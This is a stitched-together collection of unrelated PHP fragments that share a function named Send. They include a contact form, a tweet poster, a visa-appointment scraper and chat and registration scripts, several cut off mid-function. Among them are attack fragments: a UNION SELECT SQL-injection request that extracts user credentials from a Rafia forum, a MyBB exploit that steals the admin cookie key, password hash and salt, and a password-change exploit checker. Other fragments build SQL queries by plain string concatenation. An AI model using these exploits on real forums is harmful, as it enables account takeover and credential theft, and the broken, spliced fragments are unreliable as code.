function contact($name, $email, $subject, $phone, $message) { $database_manager = new DatabaseManager(); $json = array(); $body = '<p> Celular: ' . $phone . '.<br> Mensaje: ' . $message . '<br><br> Enviado desde: ' . $_SERVER['SERVER_NAME'] . ' </p>'; try { if (Send($email, $name, $subject, EMAIL_INFO, $body, $email, $name)) { $database_manager->Connect(); if ($database_manager->ExecuteProcedure(SP_INSERTA_CONTACTO, '\'' . $name . '\', \'' . $email . '\',\'' . $subject . '\',\'' . $phone . '\',\'' . $message . '\', \'' . EMAIL_INFO . '\'')) { $json[] = array('error' => 'false', 'message' => 'Mensaje enviado con éxito.'); } else { $json[] = array('error' => 'false', 'message' => 'Mensaje enviado con éxito, pero hubo un error al momento de almacenar la información en la base de datos.'); } $database_manager->CloseConnection(); } } catch (Exception $e) { $json[] = array('error' => 'true', 'message' => 'Hubo un error, por favor, intente nuevamente. Definición del error: ' . $e->getMessage()); } echo json_encode($json); }
function Login() { $Response = @Send(); if (eregi("refresh", $Response)) { $msg = "[-] Password changed .\n"; } elseif (eregi("<div align='center'>", $Response)) { $msg = "[-] Bad username .\n"; } else { $msg = "[-] Exploit failed .\n"; } return $msg; }
function init() { // Initiate curl $ch = curl_init(); // Disable SSL verification curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Will return the response, if false it print the response curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Set the url curl_setopt($ch, CURLOPT_URL, 'http://lightregions.com/data/data.json'); // Execute $result = curl_exec($ch); // Closing curl_close($ch); // Will dump a beauty json :3 $json_array = json_decode($result, true); $categoryIndex = 0; $imageIndex = 0; $category_count = count($json_array['menu'][0]['sub-items']); session_start(); if (isset($_SESSION['categoryIndex']) && $_SESSION['categoryIndex'] < $category_count) { $categoryIndex = intval($_SESSION['categoryIndex']); $image_count = intval(count($json_array['menu'][0]['sub-items'][$categoryIndex]['images'])); if (isset($_SESSION['imageIndex']) && $_SESSION['imageIndex'] < $image_count) { $imageIndex = intval($_SESSION['imageIndex']); } else { if ($categoryIndex + 1 < $category_count) { $categoryIndex += 1; } else { $categoryIndex = 0; } } } $image_count = count($json_array['menu'][0]['sub-items'][$categoryIndex]['images']); $nextImage = intval($imageIndex) + 1; $_SESSION['categoryIndex'] = intval($categoryIndex) . '<br/>'; $_SESSION['imageIndex'] = $nextImage . '<br/>'; $title = $json_array['menu'][0]['sub-items'][$categoryIndex]['images'][$imageIndex]['title']; $direct_url = 'http://lightregions.com/#photography?category=' . $json_array['menu'][0]['sub-items'][$categoryIndex]['name'] . '&content=&index=' . $imageIndex; $status = $direct_url . '#lightregions #photography #LA #' . $json_array['menu'][0]['sub-items'][$categoryIndex]['name'] . ' #' . $title; $image_path = 'http://lightregions.com' . $json_array['menu'][0]['sub-items'][$categoryIndex]['images'][$imageIndex]['url']; $newTweet = ['status' => $status, 'media' => $image_path]; $newTweet = array('status' => $status, 'media[]' => $image_path); Send($newTweet); }
} else { if (!in_array(strtolower($g[1]), get_class_methods(strtolower($g[0])))) { Send(array("err" => array("id" => 102, "msg" => "Unbekannte Methode"))); } try { $result = call_user_func(array(strtolower($g[0]), strtolower($g[1])), $_REQUEST); } catch (APIException $ex) { unset($_ENV["APIExpires"]); $o = array(); $o["err"]["id"] = $ex->getCode(); $o["err"]["msg"] = $ex->getMessage(); Send($o); exit(1); } } Send(array("result" => $result)); function Send($data) { global $pgmstart, $wgXMLRoot; if (!is_array($data)) { $data = array("result" => $data); } if (!isset($data["err"])) { $data["err"]["id"] = 0; $data["err"]["msg"] = ""; } $data["runtime"] = microtime(true) - $pgmstart; if (isset($_ENV["APIExpires"])) { header("Pragma: public"); header("Cache-Control: maxage=" . ($_ENV["APIExpires"] + 0)); header('Expires: ' . gmdate('D, d M Y H:i:s', time() + $_ENV["APIExpires"]) . ' GMT');
// { // return $result; // } // curl_close( $ch ); // //// var_dump($result); // if(curl_errno($ch)) // { // echo 'Ошибка curl: ' . curl_error($ch); // } $html = str_get_html($result); echo $html; curl_close($ch); } // $table=Send($url0,$formpost,$header); Send($url0, $formpost, $headerbig); // $dani=$table->find("span[id=lblAvailApptDate]"); // if(is_array($dani)){ // $m=1; // foreach($dani as $span){ // // $item1=$span->plaintext; // } //} //echo //"<form method='post' action='https://www.visaservices.firm.in/SVAC-UAE-APP/AppointmentScheduling/AcceptApplicant.aspx?param=2PUG/+qQtHmL+1e/l5pVZITBfW8EjFwzADeyZB7dY3/6X8uryZ+OXWga+MYFX0dF12ANWZCsXQCMqihbuj+PAfxOcVo4gszpHJkm7YYgZr4=' > //<table style=\"border-color:red\"> //<tr> //<th>id</th> //<th>date</th> //</tr>";
function SI_Packet() { global $host, $path, $cookie; $Packet .= "GET {$path}/forum.php?action=addcomment&id=1&qc=-999'+UNION+ALL+SELECT+1,concat(0x313a3a,username,0x3a3a,password,0x3a3a)+FROM+rafia_users+where+userid='1 HTTP/1.1 \r\n"; $Packet .= "Host : {$host} \r\n"; $Packet .= "{$cookie} \r\n"; $Packet .= "Referer: http://{$host}/{$path}/forum.php\r\n"; return Send($Packet); }
include_once $_SERVER[DOCUMENT_ROOT] . "/ryulib/disk.php"; include_once $_SERVER[DOCUMENT_ROOT] . "/ryulib/mysql.php"; include_once $_SERVER[DOCUMENT_ROOT] . "/ryulib/templet.php"; header("Content-type: text/xml;charset=utf-8"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); function Send($Text) { echo iconv("euckr", "utf-8", $Text); } $Host = "localhost"; $DB_User = "******"; $DB_Pass = "******"; $DB_Name = "MegaTube"; $DB = new TMyConnection($Host, $DB_User, $DB_Pass, $DB_Name); $DB->Open(); if ($DB->ErrorCode != 0) { die("DB 접속에 실패하였습니다."); } $Query = new TMyQuery($DB); $Query->DateFields = "Date; "; $Query->SelectField = " * "; $Query->SQL = " Select @SelectField from Notice "; $Query->Open($Query->SQL); echo "<Records>"; Send($Query->DataSetProducer("<Record><Date>#Date#</Date><Title>#Title#</Title></Record>")); echo "</Records>"; ?>
function Play() { global $State; $Res = true; if ($State['TransportState'] == "Stopped") { if (Send("ACTION Ds/Playlist 1 Play") == false) { $Res = false; } $State['TransportState'] = "Starting"; } return $Res; }
<?php header("Content-type: text/xml;charset=utf-8"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); function Send($Text) { echo iconv("euckr", "utf-8", $Text); } Send("╬хЁГго╪╪©Д? Hello?"); ?>
curl_setopt($ch, CURLOPT_COOKIEJAR, ".//my_cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, ".//my_cookies.txt"); curl_setopt($ch, CURLOPT_HEADER, TRUE); $result = curl_exec($ch); // var_dump($result); if (curl_errno($ch)) { echo 'Ошибка curl: ' . curl_error($ch); } $html = str_get_html($result); return $html; } $url0 = 'https://www.visaservices.firm.in/SVAC-UAE-APP/AppointmentScheduling/AcceptApplicant.aspx?'; $data = array('__EVENTTARGET' => 'ddlAppCategory', '__EVENTARGUMENT' => '', '__VIEWSTATE' => 'dDwtMTMwNTg2NjE0NTt0PHA8bDxDYXNlVHlwZTtDYWxsZXJJRDtNb2RlO21lbnVpZDtDb3VudHJ5Oz47bDxPTkxJTkU7T05MSU5FO1NDSDsjRmFsc2UjO0ZyYW5jZTs', 'txtNoOfApp' => '1', 'ddlAC' => 1); $formp = array('__EVENTTARGET' => 'ddlAppCategory', '__EVENTARGUMENT' => '', '__VIEWSTATE' => 'dDwtMTMwNTg2NjE0NTt0PHA8bDxDYXNlVHlwZTtDYWxsZXJJRDtNb2RlO21lbnVpZDtDb3VudHJ5Oz47bDxPTkxJTkU7T05MSU5FO1NDSDsjRmFsc2UjO0ZyYW5jZTs+PjtsPGk8MD47PjtsPHQ8O2w8aTwxPjtpPDM+O2k8NT47aTw3PjtpPDk+O2k8MTE+Oz47bDx0PHA8bDxWaXNpYmxlOz47bDxvPGY+Oz4+Ozs+O3Q8cDxwPGw8TW9kZTs+O2w8U0NIOz4+Oz47bDxpPDM+Oz47bDx0PHA8cDxsPFRleHQ7VmlzaWJsZTs+O2w8QmFjaztvPGY+Oz4+Oz47Oz47Pj47dDxwPGw8VmlzaWJsZTs+O2w8bzxmPjs+PjtsPGk8MD47PjtsPHQ8O2w8aTwwPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxQXD5cPFNQQU4gc3R5bGU9IkZPTlQtU0laRTogMTRwdFw7IENPTE9SOiAjZmY2NjMzXDsgTElORS1IRUlHSFQ6IDExNSVcOyBGT05ULUZBTUlMWTogJ1ZlcmRhbmEnLCdzYW5zLXNlcmlmJ1w7IG1zby1iaWRpLWZvbnQtc2l6ZTogMTYuMHB0XDsgbXNvLWZhcmVhc3QtZm9udC1mYW1pbHk6IENhbGlicmlcOyBtc28tZmFyZWFzdC10aGVtZS1mb250OiBtaW5vci1sYXRpblw7IG1zby1iaWRpLWZvbnQtZmFtaWx5OiBBcmlhbFw7IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1VU1w7IG1zby1mYXJlYXN0LWxhbmd1YWdlOiBFTi1VU1w7IG1zby1iaWRpLWxhbmd1YWdlOiBBUi1TQSJcPkRJU0NMQUlNRVJcPEJSXD5cPC9TUEFOXD5cPFNQQU4gc3R5bGU9IkZPTlQtU0laRTogOHB0XDsgQ09MT1I6IGJsYWNrXDsgTElORS1IRUlHSFQ6IDExNSVcOyBGT05ULUZBTUlMWTogJ1ZlcmRhbmEnLCdzYW5zLXNlcmlmJ1w7IG1zby1iaWRpLWZvbnQtc2l6ZTogOC41cHRcOyBtc28tZmFyZWFzdC1mb250LWZhbWlseTogQ2FsaWJyaVw7IG1zby1mYXJlYXN0LXRoZW1lLWZvbnQ6IG1pbm9yLWxhdGluXDsgbXNvLWJpZGktZm9udC1mYW1pbHk6IEFyaWFsXDsgbXNvLWFuc2ktbGFuZ3VhZ2U6IEVOLVVTXDsgbXNvLWZhcmVhc3QtbGFuZ3VhZ2U6IEVOLVVTXDsgbXNvLWJpZGktbGFuZ3VhZ2U6IEFSLVNBIlw+XDxCUlw+DQoJCQlcPC9TUEFOXD5cPFNQQU4gc3R5bGU9IkZPTlQtU0laRTogOXB0XDsgQ09MT1I6IGJsYWNrXDsgTElORS1IRUlHSFQ6IDExNSVcOyBGT05ULUZBTUlMWTogJ1ZlcmRhbmEnLCdzYW5zLXNlcmlmJ1w7IG1zby1iaWRpLWZvbnQtc2l6ZTogMTAuMHB0XDsgbXNvLWZhcmVhc3QtZm9udC1mYW1pbHk6IENhbGlicmlcOyBtc28tZmFyZWFzdC10aGVtZS1mb250OiBtaW5vci1sYXRpblw7IG1zby1iaWRpLWZvbnQtZmFtaWx5OiBBcmlhbFw7IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1VU1w7IG1zby1mYXJlYXN0LWxhbmd1YWdlOiBFTi1VU1w7IG1zby1iaWRpLWxhbmd1YWdlOiBBUi1TQSJcPllvdSANCm11c3QgcmVhZCB0aGUgXDwvU1BBTlw+XDxTUEFOIHN0eWxlPSJGT05ULVNJWkU6IDExcHRcOyBMSU5FLUhFSUdIVDogMTE1JVw7IEZPTlQtRkFNSUxZOiAnQ2FsaWJyaScsJ3NhbnMtc2VyaWYnXDsgbXNvLWZhcmVhc3QtZm9udC1mYW1pbHk6IENhbGlicmlcOyBtc28tZmFyZWFzdC10aGVtZS1mb250OiBtaW5vci1sYXRpblw7IG1zby1iaWRpLWZvbnQtZmFtaWx5OiAnVGltZXMgTmV3IFJvbWFuJ1w7IG1zby1hbnNpLWxhbmd1YWdlOiBFTi1VU1w7IG1zby1mYXJlYXN0LWxhbmd1YWdlOiBFTi1VU1w7IG1zby1iaWRpLWxhbmd1YWdlOiBBUi1TQVw7IG1zby1hc2NpaS10aGVtZS1mb250OiBtaW5vci1sYXRpblw7IG1zby1oYW5zaS10aGVtZS1mb250OiBtaW5vci1sYXRpblw7IG1zby1iaWRpLXRoZW1lLWZvbnQ6IG1pbm9yLWJpZGkiXD5cPEEgaHJlZj0iaHR0cDovL3d3dy52ZnNnbG9iYWwuY29tL3NwYWluL1FhdGFyL2Rpc2NsYWltZXIuaHRtbCIgdGFyZ2V0PSJfYmxhbmsiXD5cPFNQQU4gc3R5bGU9IkZPTlQtU0laRTogOXB0XDsgQ09MT1I6IGJsdWVcOyBMSU5FLUhFSUdIVDogMTE1JVw7IEZPTlQtRkFNSUxZOiAnVmVyZGFuYScsJ3NhbnMtc2VyaWYnXDsgbXNvLWJpZGktZm9udC1zaXplOiAxMC4wcHRcOyBtc28tYmlkaS1mb250LWZhbWlseTogQXJpYWwiXD5UZXJtcyANCiZhbXBcOyBDb25kaXRpb25zXDwvU1BBTlw+XDwvQVw+XDwvU1BBTlw+XDxTUEFOIHN0eWxlPSJGT05ULVNJWkU6IDlwdFw7IENPTE9SOiBibGFja1w7IExJTkUtSEVJR0hUOiAxMTUlXDsgRk9OVC1GQU1JTFk6ICdWZXJkYW5hJywnc2Fucy1zZXJpZidcOyBtc28tYmlkaS1mb250LXNpemU6IDEwLjBwdFw7IG1zby1mYXJlYXN0LWZvbnQtZmFtaWx5OiBDYWxpYnJpXDsgbXNvLWZhcmVhc3QtdGhlbWUtZm9udDogbWlub3ItbGF0aW5cOyBtc28tYmlkaS1mb250LWZhbWlseTogQXJpYWxcOyBtc28tYW5zaS1sYW5ndWFnZTogRU4tVVNcOyBtc28tZmFyZWFzdC1sYW5ndWFnZTogRU4tVVNcOyBtc28tYmlkaS1sYW5ndWFnZTogQVItU0EiXD4gDQphbmQgdGhlIFw8L1NQQU5cPlw8U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiAxMXB0XDsgTElORS1IRUlHSFQ6IDExNSVcOyBGT05ULUZBTUlMWTogJ0NhbGlicmknLCdzYW5zLXNlcmlmJ1w7IG1zby1mYXJlYXN0LWZvbnQtZmFtaWx5OiBDYWxpYnJpXDsgbXNvLWZhcmVhc3QtdGhlbWUtZm9udDogbWlub3ItbGF0aW5cOyBtc28tYmlkaS1mb250LWZhbWlseTogJ1RpbWVzIE5ldyBSb21hbidcOyBtc28tYW5zaS1sYW5ndWFnZTogRU4tVVNcOyBtc28tZmFyZWFzdC1sYW5ndWFnZTogRU4tVVNcOyBtc28tYmlkaS1sYW5ndWFnZTogQVItU0FcOyBtc28tYXNjaWktdGhlbWUtZm9udDogbWlub3ItbGF0aW5cOyBtc28taGFuc2ktdGhlbWUtZm9udDogbWlub3ItbGF0aW5cOyBtc28tYmlkaS10aGVtZS1mb250OiBtaW5vci1iaWRpIlw+XDxBIGhyZWY9Imh0dHA6Ly93d3cudmZzZ2xvYmFsLmNvbS9zcGFpbi9RYXRhci9kaXNjbGFpbWVyLmh0bWwiIHRhcmdldD0iX2JsYW5rIlw+XDxTUEFOIHN0eWxlPSJGT05ULVNJWkU6IDlwdFw7IENPTE9SOiBibHVlXDsgTElORS1IRUlHSFQ6IDExNSVcOyBGT05ULUZBTUlMWTogJ1ZlcmRhbmEnLCdzYW5zLXNlcmlmJ1w7IG1zby1iaWRpLWZvbnQtc2l6ZTogMTAuMHB0XDsgbXNvLWJpZGktZm9udC1mYW1pbHk6IEFyaWFsIlw+RGF0YSANClByb3RlY3Rpb24gTm90aWNlXDwvU1BBTlw+XDwvQVw+XDwvU1BBTlw+XDxTUEFOIHN0eWxlPSJGT05ULVNJWkU6IDlwdFw7IENPTE9SOiBibGFja1w7IExJTkUtSEVJR0hUOiAxMTUlXDsgRk9OVC1GQU1JTFk6ICdWZXJkYW5hJywnc2Fucy1zZXJpZidcOyBtc28tYmlkaS1mb250LXNpemU6IDEwLjBwdFw7IG1zby1mYXJlYXN0LWZvbnQtZmFtaWx5OiBDYWxpYnJpXDsgbXNvLWZhcmVhc3QtdGhlbWUtZm9udDogbWlub3ItbGF0aW5cOyBtc28tYmlkaS1mb250LWZhbWlseTogQXJpYWxcOyBtc28tYW5zaS1sYW5ndWFnZTogRU4tVVNcOyBtc28tZmFyZWFzdC1sYW5ndWFnZTogRU4tVVNcOyBtc28tYmlkaS1sYW5ndWFnZTogQVItU0EiXD4gDQp3aGljaCBhcHBseSB0byBvdXIgdmlzYSBhcHBvaW50bWVudCBzY2hlZHVsaW5nIHNlcnZpY2UgYW5kIGFueSBvdGhlciBoZWxwLCANCnN1cHBvcnQsIGFkdmljZSBhbmQgaW5mb3JtYXRpb24gc2VydmljZXMgd2UgcHJvdmlkZSB0byB5b3UgcmVsYXRpbmcgdG8gU2NoZW5nZW4gDQp2aXNhcywgYW5kIHlvdSBtdXN0IGFncmVlIHRvIHRoZSBzYW1lIHRvIGVuYWJsZSB1cyB0byBwcm9jZWVkIGZ1cnRoZXIgdG8gDQpzY2hlZHVsZSB5b3VyIGFwcG9pbnRtZW50IG9ubGluZS4gUGxlYXNlIG1ha2Ugc3VyZSB0aGF0IHlvdSBoYXZlIHJlYWQgYW5kIA0KdW5kZXJzdG9vZCB0aGVzZSBhbmQgYWxsIHRoZSByZWxldmFudCBub3RlcyBhbmQgY29uZmlybSB0aGUgc2FtZSBieSB0aWNraW5nIHRoZSANCmFwcHJvcHJpYXRlIGNoZWNrYm94IHRvIHByb2NlZWQuXDxCUlw+XDxCUlw+XDxTVFJPTkdcPlw8U1BBTiBzdHlsZT0iRk9OVC1GQU1JTFk6ICdWZXJkYW5hJywnc2Fucy1zZXJpZidcOyBtc28tYmlkaS1mb250LWZhbWlseTogQXJpYWwiXD5PbmNlIA0KeW91IGNsaWNrIG9uICJJIEFncmVlIiwgaXQgd2lsbCBiZSBhc3N1bWVkIHRoYXQgeW91IGhhdmUgYWdyZWVkIGFuZCBhdXRob3JpemVkIA0KdXMgdG8gaW1tZWRpYXRlbHkgY29tbWVuY2UgcHJvY2Vzc2luZyBvZiB5b3VyIGFwcG9pbnRtZW50IHJlcXVlc3QgYW5kIHByb3ZpZGluZyANCmFueSBzZXJ2aWNlcyBhdmFpbGVkIGZvci4gXDwvU1BBTlw+XDwvU1RST05HXD5cPEJSXD5cPEJSXD5JIGhhdmUgcmVhZCBhbmQgdW5kZXJzdG9vZCB0aGUgDQpUZXJtcyAmYW1wXDsgQ29uZGl0aW9ucywgRGF0YSBQcm90ZWN0aW9uIE5vdGljZS4gSSBjb25maXJtIG15IGFncmVlbWVudCB0byB0aGVtLiANCkkgd291bGQgbm93IGxpa2UgdG8gY29udGludWUgd2l0aCBteSBvbmxpbmUgDQphcHBsaWNhdGlvbjotXDwvU1BBTlw+XDwvUFw+Oz4+Ozs+Oz4+Oz4+O3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47bDxpPDA+Oz47bDx0PDtsPGk8MD47PjtsPHQ8dDw7O2w8aTwwPjs+Pjs7Pjs+Pjs+Pjt0PHA8bDxWaXNpYmxlOz47bDxvPHQ+Oz4+O2w8aTwwPjs+O2w8dDw7bDxpPDM+O2k8OT47aTwxMT47aTwxMz47aTwxNT47aTwxNz47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8T2JqZWN0IHJlZmVyZW5jZSBub3Qgc2V0IHRvIGFuIGluc3RhbmNlIG9mIGFuIG9iamVjdC47Pj47Pjs7Pjt0PHA8O3A8bDxvbktleVByZXNzOz47bDxyZXR1cm4gQWNjZXB0TnVtZXJpY3MoKVw7Oz4+Pjs7Pjt0PDtsPGk8MT47PjtsPHQ8dDxwPHA8bDxEYXRhVmFsdWVGaWVsZDtEYXRhVGV4dEZpZWxkOz47bDxEYXRhVmFsdWVGaWVsZDtEYXRhVGV4dEZpZWxkOz4+Oz47dDxpPDI+O0A8XGU7U0hBUkVEIFZJU0EgQVBQTElDQVRJT04gQ0VOVFJFOz47QDwwOzE7Pj47Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8O2w8aTwwPjs+O2w8dDx0PHA8cDxsPERhdGFWYWx1ZUZpZWxkO0RhdGFUZXh0RmllbGQ7PjtsPERhdGFWYWx1ZUZpZWxkO0RhdGFUZXh0RmllbGQ7Pj47Pjt0PGk8Mj47QDxcZTtTY2hlbmdlbuKAk1JlZ3VsYXI7PjtAPDA7Mjs+Pjs+Ozs+Oz4+Oz4+O3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPDtwPGw8b25DbGljazs+O2w8cmV0dXJuIFZhbGlkYXRlKClcOzs+Pj47Oz47Pj47Pj47dDxwPGw8VmlzaWJsZTs+O2w8bzxmPjs+Pjs7Pjs+Pjs+Pjs+dgSY5ZvBKzqHFaJLBXCY74JbvTk=', 'txtNoOfApp' => '1', 'ddlAC' => '1', 'ddlAppCategory' => '2'); $formpost = http_build_query($formp); $table = Send($url0, $formpost, $header); $dani = $table->find("span[id=lblAvailApptDate]"); if (is_array($dani)) { $m = 1; foreach ($dani as $span) { $item1 = $span->plaintext; } } echo "<form method='post' action='https://www.visaservices.firm.in/SVAC-UAE-APP/AppointmentScheduling/AcceptApplicant.aspx?param=2PUG/+qQtHmL+1e/l5pVZITBfW8EjFwzADeyZB7dY3/6X8uryZ+OXWga+MYFX0dF12ANWZCsXQCMqihbuj+PAfxOcVo4gszpHJkm7YYgZr4=' >\n<table style=\"border-color:red\">\n<tr>\n<th>id</th>\n<th>date</th>\n</tr>"; echo "<tr>" . ""; echo "<td>" . 1 . "</td>"; echo "<td>" . $item1 . "</td>"; echo "<td> <input type=\"submit\" style=\"background-color: rgb(43, 253, 43);\" value=\"Assign\"</td>"; echo "</tr>"; echo "</table>"; echo "</form>";
<?php include 'api.php'; if (!mysql_select_db($BdName)) { exit; } Header("Cache-Control: no-cache, must-revalidate"); Header("Pragma: no-cache"); Header("Content-Type: text/javascript; charset=utf-8"); if (isset($_POST['act'])) { switch ($_POST['act']) { case "send": Send(); break; case "load": Load(); break; default: exit; } } // Функция выполняем сохранение сообщения в базе данных function Send() { $name = substr($_POST['name'], 0, 200); $name = htmlspecialchars($name); $name = mysql_escape_string($name); $text = substr($_POST['text'], 0, 200); $text = htmlspecialchars($text); $text = mysql_escape_string($text); mysql_query("INSERT INTO messages (name,text) VALUES ('" . $name . "', '" . $text . "')");
function mybb_exploit() { global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid; if ($user && $pass) { echo "[+] Logging in... "; $u = $url . $dir . "member.php"; $post = "username="******"&password="******"&action=do_login&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode("\n", $html); foreach ($lines as $line) { if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line, " sid=")) { $cookies = get_string($line, "Set-Cookie: ", ";"); } } if (!$cookies) { die("Failed\n"); } echo "Successfull\n\n"; } $fld1 = "loginkey"; $fld2 = "username"; $min = 48; $max = 122; $mid = 91; $res = get_data($forum); list($key, $auser) = explode(" ", $res); if ($key && strlen($key) == 50) { $cookie = sprintf($base, $pass); list($cname) = explode("=", $cookies); owrite("\n[+] Target: {$url} [{$forum}]\n"); owrite("[+] Found admin cookie '" . $cname . "': '1_" . $key . "'\n"); } else { die("[X] Failed to retrive informations\n"); } $fld1 = "password"; $fld2 = "salt"; $res = get_data($forum); list($apwd, $salt) = explode(" ", $res); if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) { owrite("[+] Found admin hash password: '******'\n"); owrite("[+] Found admin password salt: '" . $salt . "'\n"); } else { echo "[!] No admin sid was found\n"; } }
$db->close(); MessageSend(1, 'Пользователь с введенным Эл. Адресом уже зарегистрирован!'); } $IPRow = $db->fetch_assoc($db->execute("SELECT `ip` FROM `users` WHERE `ip` = '" . GetIP() . "'")); if (!empty($IPRow['ip'])) { MessageSend(1, 'Мульти-аккаунты запрещены!', '/register/'); } $pass = ToPass($pass); if (isset($_SESSION['REFERAL']) && !empty($_SESSION['REFERAL'])) { $referal = $_SESSION['REFERAL']; $Row = $db->fetch_assoc($db->execute("SELECT `id` FROM `users` WHERE `id` = '{$referal}'")); if (!empty($Row['id'])) { $referal = $Row['id']; $db->execute("UPDATE `money` SET `balance` = `balance` + 15 WHERE `username` = '" . IDToLogin($referal) . "'"); PM: Send('Новый реферал!', 'За приглашённого вами реферала (' . $login . ') вам на счёт перечисленно 15 рублей!<br><br>Спасибо за помощь проекту!', $referal, 2); } else { $referal = 'NULL'; } } else { $referal = 'NULL'; } $db->execute("INSERT INTO `users` (`login`,`passw`,`reg_date`,`email`,`group`,`ip`,`referal`) VALUES ('{$login}','{$pass}','" . time() . "','{$email}','1','" . GetIP() . "','{$referal}')"); $Row = $db->fetch_assoc($db->execute("SELECT `id` FROM `users` WHERE `login` = '{$login}'")); if (empty($Row['id'])) { $db->close(); MessageSend(1, "При регистрации возникла непредвиденаня ошибка! Прежде чем обращаться к администрации проверьте свой аккаунт (зарегестрирован или нет?)."); } $id = $Row['id']; $db->execute("INSERT INTO `money` (`id`,`realmoney`,`balance`) VALUES ('{$id}',0,0)"); $db->close();
$view_ip = 0; $moder = 0; if (isset($user_p_config) and $user_p_config == 1) { $view_ip = 1; } if (isset($user_p_mod) and $user_p_mod == 1) { $moder = 1; } Header("Cache-Control: no-cache, must-revalidate"); Header("Pragma: no-cache"); Header("Content-Type: text/javascript; charset=utf-8"); if (isset($_GET['act'])) { switch ($_GET['act']) { case "send": // если она равняется send, вызываем функцию Send() Send($user_nick, $moder); break; case "load": // если она равняется load, вызываем функцию Load() Load($user_nick); break; case "members": // если она равняется load, вызываем функцию Load() Members($view_ip); break; default: // если ни тому и не другому - выходим echo time(); } } function Send($user_nick, $moder)